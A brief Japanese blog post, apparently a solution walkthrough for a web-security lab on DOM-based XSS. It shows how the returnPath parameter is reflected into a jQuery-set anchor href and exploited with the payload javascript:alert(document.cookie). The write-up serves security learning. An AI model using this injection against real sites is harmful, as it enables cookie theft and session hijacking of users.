DOM XSS in jQuery anchor href attribute sink using location.search source
Submit feedbackリンクをクリック
URLの
feedback?returnPath=/ の部分を
feedback?returnPath=abc とかに変更してエンター
DEVツールで、abcを検索して確認
<a id=”backLink” href=”abc”>Back</a>
abcが埋め込まれている
URLを
feedback?returnPath=javascript:alert(document.cookie)
に変えてエンター
*javascript:の部分なぜかコピペできない。手打ち
ソースを確認すると、
<a id="backLink" href="javascript:alert(document.cookie)">Back</a>
Backのリンクをクリックで実行される
クリア!
–)v
コメント